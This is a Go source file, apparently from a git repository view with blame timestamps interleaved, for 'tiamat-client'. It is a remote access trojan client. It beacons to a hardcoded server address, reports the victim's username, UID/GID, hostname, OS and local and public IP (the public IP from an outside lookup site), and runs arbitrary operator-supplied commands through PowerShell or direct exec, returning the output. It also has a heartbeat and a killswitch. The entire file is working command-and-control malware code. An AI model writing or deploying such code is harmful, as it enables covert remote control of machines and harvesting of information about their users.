tiamat-client/main.go

199 lines
3.9 KiB
Go
Raw Normal View History

2024-06-03 10:06:33 +02:00
package main
import (
"encoding/gob"
2024-06-03 15:06:44 +02:00
"fmt"
"io"
2024-06-03 10:06:33 +02:00
"log"
"net"
"net/http"
2024-06-03 10:06:33 +02:00
"os"
"os/exec"
2024-06-03 10:06:33 +02:00
"os/user"
2024-06-03 15:06:44 +02:00
"runtime"
2024-06-04 09:36:28 +02:00
"strings"
"time"
2024-06-03 10:06:33 +02:00
)
type Client struct {
2024-06-03 15:06:44 +02:00
Username string
UID string
GID string
2024-06-03 10:06:33 +02:00
OperatingSystem string
2024-06-03 15:06:44 +02:00
Hostname string
PublicIP string
LocalIP string
2024-06-03 15:06:44 +02:00
}
type Instructions struct {
2024-06-07 10:00:09 +02:00
IsHeartbeat bool
IsCommand bool
IsKillswitch bool
Message string
}
type Response struct {
Successful bool
Message string
2024-06-03 10:06:33 +02:00
}
var (
2024-06-07 10:00:09 +02:00
RemoteIP = "192.168.1.181"
RemotePort = "1302"
2024-06-03 10:06:33 +02:00
)
func main() {
log.SetPrefix("[TIAMAT-CLIENT] ")
for {
if err := start(); err != nil {
log.Print(err)
}
time.Sleep(time.Second * 5)
}
}
func start() error {
2024-06-03 10:06:33 +02:00
conn, err := net.Dial("tcp", RemoteIP+":"+RemotePort)
if err != nil {
e := fmt.Errorf("Error happened connecting to server: %v\n", err)
return e
2024-06-03 10:06:33 +02:00
}
defer conn.Close()
localIP := fmt.Sprint(conn.LocalAddr().(*net.TCPAddr).IP)
if err := sendOSInfo(conn, localIP); err != nil {
return err
2024-06-03 10:06:33 +02:00
}
for {
if err := awaitInstructions(conn); err != nil {
e := fmt.Errorf("Error happened awaiting instructions: %v\n", err)
return e
}
}
}
func getIP() (string, error) {
res, err := http.Get("https://ip.bulgariu.xyz")
if err != nil {
log.Printf("Error happened GETting IP: %v\n", err)
return "", nil
}
resbody, err := io.ReadAll(res.Body)
if err != nil {
log.Printf("Error happened reading IP body: %v\n", err)
return "", nil
2024-06-03 10:06:33 +02:00
}
2024-06-04 09:36:28 +02:00
ip := strings.TrimRight(string(resbody), "\n")
return ip, nil
2024-06-03 10:06:33 +02:00
}
func sendOSInfo(conn net.Conn, localIP string) error {
2024-06-03 10:06:33 +02:00
currentUser, err := user.Current()
if err != nil {
e := fmt.Errorf("Error happened getting user: %v\n", err)
return e
2024-06-03 10:06:33 +02:00
}
2024-06-03 15:06:44 +02:00
clientHostname, err := os.Hostname()
if err != nil {
e := fmt.Errorf("Error happened getting hostname: %v\n", err)
return e
}
ip, err := getIP()
if err != nil {
e := fmt.Errorf("Error happened pulling IP: %v\n", err)
return e
2024-06-03 15:06:44 +02:00
}
2024-06-03 10:06:33 +02:00
newClient := Client{
2024-06-03 15:06:44 +02:00
Username: currentUser.Username,
UID: currentUser.Uid,
GID: currentUser.Gid,
OperatingSystem: runtime.GOOS,
Hostname: clientHostname,
PublicIP: ip,
LocalIP: localIP,
2024-06-03 10:06:33 +02:00
}
2024-06-03 15:06:44 +02:00
enc := gob.NewEncoder(conn)
2024-06-03 10:06:33 +02:00
err = enc.Encode(newClient)
if err != nil {
e := fmt.Errorf("Error happened sending OS info to server: %v\n", err)
return e
2024-06-03 10:06:33 +02:00
}
return nil
}
2024-06-03 15:06:44 +02:00
func awaitInstructions(conn net.Conn) error {
dec := gob.NewDecoder(conn)
inst := Instructions{}
err := dec.Decode(&inst)
if err != nil {
return err
}
switch {
///////////////////////////////
case inst.IsHeartbeat == true && inst.Message == "PING":
if err := Heartbeat(conn); err != nil {
return err
2024-06-04 09:36:28 +02:00
}
return nil
///////////////////////////////
case inst.IsCommand == true:
executeCommand(conn, inst.Message)
///////////////////////////////
2024-06-07 10:00:09 +02:00
case inst.IsKillswitch == true:
os.Exit(0)
default:
sendMessage(Response{Successful: false, Message: "Unknown order!"}, conn)
}
///////////////////////////////
return nil
}
func Heartbeat(conn net.Conn) error {
resp := Response{Successful: true, Message: "PONG"}
err := sendMessage(resp, conn)
if err != nil {
return err
}
return nil
}
func executeCommand(conn net.Conn, command string) {
var out []byte
var err error
formattedCommand := strings.Fields(command)
switch runtime.GOOS {
case "windows":
t := []string{"-NoProfile"}
t = append(t, formattedCommand...)
out, err = exec.Command("powershell", t...).Output()
case "linux":
out, err = exec.Command(formattedCommand[0], formattedCommand[1:]...).Output()
}
if err != nil {
errorMsg := fmt.Sprintf("%v\n", err)
resp := Response{Successful: false, Message: errorMsg}
sendMessage(resp, conn)
return
}
resp := Response{
Successful: true,
Message: string(out),
}
sendMessage(resp, conn)
}
func sendMessage(resp Response, conn net.Conn) error {
enc := gob.NewEncoder(conn)
err := enc.Encode(&resp)
if err != nil {
return err
}
2024-06-03 10:06:33 +02:00
return nil
}